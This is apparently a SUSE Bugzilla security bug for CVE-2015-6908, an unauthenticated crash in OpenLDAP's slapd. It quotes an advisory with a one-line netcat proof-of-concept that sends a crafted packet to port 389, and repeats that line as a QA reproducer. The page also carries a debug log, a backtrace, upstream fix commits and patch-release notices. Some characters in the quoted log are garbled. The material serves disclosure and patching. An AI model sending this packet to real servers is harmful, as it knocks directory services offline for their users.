Bugzilla – Bug 945582
VUL-0: CVE-2015-6908: openldap2: ber_get_next remote denial of service vulnerability
Last modified: 2017-08-02 14:02:15 UTC
via oss-sec http://www.openldap.org/its/index.cgi/Software%20Bugs?id=8240 OpenLDAP ber_get_next Denial of Service Affected Versions: OpenLDAP <= 2.4.42 +-------------+ | Description | +-------------+ This document details a vulnerability found within the OpenLDAP server daemon. A Denial of Service vulnerability was discovered within the slapd daemon, allowing an unauthenticated attacker to crash the OpenLDAP server. By sending a crafted packet, an attacker may cause the OpenLDAP server to reach an assert(9 9 statement, crashing the daemon. This was tested on OpenLDAP 2.4.42 (built with GCC 4.9.2) and OpenLDAP 2.4.40 installed from the Debian package repository. +--------------+ | Exploitation | +--------------+ By sending a crafted packet, an attacker can cause the OpenLDAP daemon to crash with a SIGABRT. This is due to an assert() call within the ber_get_next method (io.c line 682) that is hit when decoding tampered BER data. The following proof of concept exploit can be used to trigger the condition: --[ Exploit POC echo "/4SEhISEd4MKYj5ZMgAAAC8=" | base64 -d | nc -v 127.0.0.1 389 The above causes slapd to abort as follows when running with '-d3', however it should be noted that this will crash the server even when running in daemon mode. --[ adadp -d3 55f0b36e slap_listener_activate(7): 55f0b36e >>> slap_listener(ldap:///) 55f0b36e connection_get(15): got connid=1000 55f0b36e connection_read(15): checking for input on id=1000 ber_get_next ldap_read: want=8, got=8 0000: ff 84 84 84 84 84 77 83 ......w. 55f0b36e connection_get(15): got connid=1000 55f0b36e connection_read(15): checking for input on id=1000 ber_get_next ldap_read: want=1, got=1 0000: 0a . 55f0b36e connection_get(15): got connid=1000 55f0b36e connection_read(15): checking for input on id=1000 ber_get_next slapd: io.c:682: ber_get_next: Assertion `0' failed. The following GDB back trace provides further information as to the location of the issue. --[ back trace program received signal SIGABRT, Aborted. [Switching to Thread 0x7ffff2e4a700 (LWP 1371)] 0x00007ffff6a13107 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56 56 ../nptl/sysdeps/ux%x/sysv/linux/raise.c: No such file or directory. (gdb) bt #0 0x00007ffff6a13107 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56 #1 0x00007ffff6a144e8 in __GI_abort () at abort.c:89 #2 0x00007ffff6a0c226 in __assert_fail_base (fmt=0x7ffff6b42ce8 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=assertion@entry=0x55f280 "0", file=file@entry=0x59bdb1 "io.c", line=line@entry=682, function=function@entry=0x59bf33 <__PRETTY_FUNCTION__.6337> "r_r_get_next") at assert.c:92 #3 0x00007ffff6a0c2d2 in __GI___assert_fail (assertion=assertion@entry=0x55f280 "0", file=file@entry=0x59bdb1 "io.c", line=line@entry=682, function=function@entry=0x59bf33 <__PRETTY_FUNCTION__.6337> "ber_get_next") at assert.c:101 #4 0x000000000053261a in ber_get_next (sb=0x7fffe40008c0, len=0x7ffff2e49b40, ber=0x7fffe4000a00) at io.c:682 #5 0x0000000000420b56 in connection_input (cri=<optimized out>, conn=<optimized out>) at connection.c:1572 #6 connection_read (cri=<optimiz o out>, s=<optimized out>) at connection.c:1460 #7 connection_read_thread (ctx=0x7ffff2e49b90, argv=0xf) at connection.c:1284 #8 0x000000000050c871 in ldap_int_thread_pool_wrapper (xpool=0x8956c0) at tpool.c:696 #9 0x00007ffff6d8f0a4 in start_thread (arg=0x7ffff2e4a700) at pthread_create.c:309 #10 0x00007ffff6ac404d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:111 +----------+ | Solution | +----------+ Ensure that data received from untrusted sources is not able to trigger conditions resulting in the server crashing. In this specific instance, the NDEBUG macro should be defined before the inclusion of assert.h by default, requiring a specific compile time alteration to enable debug.
QA REPRODUCER: echo "/4SEhISEd4MKYj5ZMgAAAC8=" | base64 -d | nc -v 127.0.0.1 389 before: abort() the ldap server after: not aborting the ldap server
the assert(0) at the end of ber_get_next is even in sle10
hi maintainer, could you please submit to the affected codestreams?
Created attachment 649914 [details] CVE-2015-6908.patch There was some discussion upstream about whether this was a bug. The back-and-forth simple patch is below and attached as a combined patch. commit 844ee7df820fa397249ce76984d2e7094746cd93 Author: Howard Chu <hyc@symas.com> Date: Sat Sep 12 22:18:22 2015 +0100 Revert "Revert "ITS#8240 remove obsolete assert"" We have never documented our use of assert, so can't expect builders to do the right thing. This reverts commit 55dd4d3275d24c5190fdfada8dfae0320628b993. commit 55dd4d3275d24c5190fdfada8dfae0320628b993 Author: Howard Chu <hyc@openldap.org> Date: Sat Sep 12 10:07:16 2015 +0100 Revert "ITS#8240 remove obsolete assert" Not a bug. This reverts commit 6fe51a9ab04fd28bbc171da3cf12f1c1040d6629. commit 6fe51a9ab04fd28bbc171da3cf12f1c1040d6629 Author: Howard Chu <hyc@openldap.org> Date: Thu Sep 10 00:37:32 2015 +0100 ITS#8240 remove obsolete assert
An update workflow for this issue was started. This issue was rated as important. Please submit fixed packages until 2015-10-09. When done, reassign the bug to security-team@suse.de. https://swamp.suse.de/webswamp/wf/62299
poing
This is an autogenerated message for OBS integration: This bug (945582) was mentioned in https://build.opensuse.org/request/show/347172 Factory / openldap2
SUSE-SU-2016:0090-1: An update that fixes one vulnerability is now available. Category: security (moderate) Bug References: 945582 CVE References: CVE-2015-6908 Sources used: SUSE Linux Enterprise Software Development Kit 11-SP4 (src): openldap2-2.4.26-0.62.2, openldap2-client-2.4.26-0.62.2 SUSE Linux Enterprise Software Development Kit 11-SP3 (src): openldap2-2.4.26-0.62.2, openldap2-client-2.4.26-0.62.2 SUSE Linux Enterprise Server for VMWare 11-SP3 (src): openldap2-2.4.26-0.62.2, openldap2-client-2.4.26-0.62.2 SUSE Linux Enterprise Server 11-SP4 (src): openldap2-2.4.26-0.62.2, openldap2-client-2.4.26-0.62.2 SUSE Linux Enterprise Server 11-SP3 (src): openldap2-2.4.26-0.62.2, openldap2-client-2.4.26-0.62.2 SUSE Linux Enterprise Server 11-SECURITY (src): openldap2-client-openssl1-2.4.26-0.62.3 SUSE Linux Enterprise Desktop 11-SP4 (src): openldap2-client-2.4.26-0.62.2 SUSE Linux Enterprise Desktop 11-SP3 (src): openldap2-client-2.4.26-0.62.2 SUSE Linux Enterprise Debuginfo 11-SP4 (src): openldap2-2.4.26-0.62.2, openldap2-client-2.4.26-0.62.2 SUSE Linux Enterprise Debuginfo 11-SP3 (src): openldap2-2.4.26-0.62.2, openldap2-client-2.4.26-0.62.2, openldap2-client-openssl1-2.4.26-0.62.3
For bsc#904028, bsc#937766, bsc#945582, bsc#955210 please submit for openSUSE 13.2 maintenance.
This is an autogenerated message for OBS integration: This bug (945582) was mentioned in https://build.opensuse.org/request/show/354485 13.2 / openldap2
SUSE-SU-2016:0224-1: An update that solves two vulnerabilities and has one errata is now available. Category: security (important) Bug References: 937766,945582,955210 CVE References: CVE-2015-4000,CVE-2015-6908 Sources used: SUSE Linux Enterprise Software Development Kit 12-SP1 (src): openldap2-2.4.41-18.13.4, openldap2-client-2.4.41-18.13.1 SUSE Linux Enterprise Software Development Kit 12 (src): openldap2-2.4.41-18.13.4, openldap2-client-2.4.41-18.13.1 SUSE Linux Enterprise Server for SAP 12 (src): openldap2-2.4.41-18.13.4 SUSE Linux Enterprise Server 12-SP1 (src): openldap2-2.4.41-18.13.4, openldap2-client-2.4.41-18.13.1 SUSE Linux Enterprise Server 12 (src): openldap2-2.4.41-18.13.4, openldap2-client-2.4.41-18.13.1 SUSE Linux Enterprise Module for Legacy Software 12 (src): openldap2-2.4.41-18.13.4 SUSE Linux Enterprise Desktop 12-SP1 (src): openldap2-client-2.4.41-18.13.1 SUSE Linux Enterprise Desktop 12 (src): openldap2-client-2.4.41-18.13.1
openSUSE-SU-2016:0226-1: An update that solves two vulnerabilities and has two fixes is now available. Category: security (important) Bug References: 904028,937766,945582,955210 CVE References: CVE-2015-4000,CVE-2015-6908 Sources used: openSUSE 13.2 (src): openldap2-2.4.39-8.9.1, openldap2-client-2.4.39-8.9.1
openSUSE-SU-2016:0255-1: An update that solves two vulnerabilities and has two fixes is now available. Category: security (important) Bug References: 904028,937766,945582,955210 CVE References: CVE-2015-4000,CVE-2015-6908 Sources used: openSUSE 13.1 (src): openldap2-2.4.33-8.6.1, openldap2-client-2.4.33-8.6.1
Releasing last updates, all done
openSUSE-SU-2016:0261-1: An update that solves two vulnerabilities and has one errata is now available. Category: security (important) Bug References: 937766,945582,955210 CVE References: CVE-2015-4000,CVE-2015-6908 Sources used: openSUSE Leap 42.1 (src): openldap2-2.4.41-11.1, openldap2-client-2.4.41-11.1
SUSE-SU-2016:0262-1: An update that fixes two vulnerabilities is now available. Category: security (important) Bug References: 937766,945582 CVE References: CVE-2015-4000,CVE-2015-6908 Sources used: SUSE Studio Onsite 1.3 (src): openldap2-client-2.4.26-0.17.23.1
This is an autogenerated message for OBS integration: This bug (945582) was mentioned in https://build.opensuse.org/request/show/514048 42.3 / openldap2